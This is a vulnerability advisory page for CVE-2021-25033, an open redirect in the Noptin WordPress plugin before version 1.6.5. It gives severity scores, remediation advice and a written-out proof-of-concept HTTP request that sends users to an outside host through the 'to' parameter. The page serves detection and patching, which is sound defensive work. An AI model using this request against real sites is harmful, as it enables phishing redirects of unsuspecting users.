🔙 목록으로 돌아가기

CVE-2021-25033: Noptin < 1.6.5 - Open Redirect

TitleNoptin < 1.6.5 - Open Redirect
AuthordhiyaneshDk
SeverityMedium
ImpactAn attacker can trick users into visiting malicious websites, leading to phishing attacks.
RemediationUpdate to Noptin plugin version 1.6.5 or later.
CVSS Score6.1
EPSS Score0.01059
CVE IDCVE-2021-25033
CWE IDCWE-601
Tags cve2021 cve wp wpscan wordpress redirect wp-plugin noptin vuln

🔍 Vulnerability Description

Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the “to” parameter before redirecting the user to its given value, leading to an open redirect issue.

🌐 HTTP Request

GET /?noptin_ns=email_click&to=https://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-25033.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-25033.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A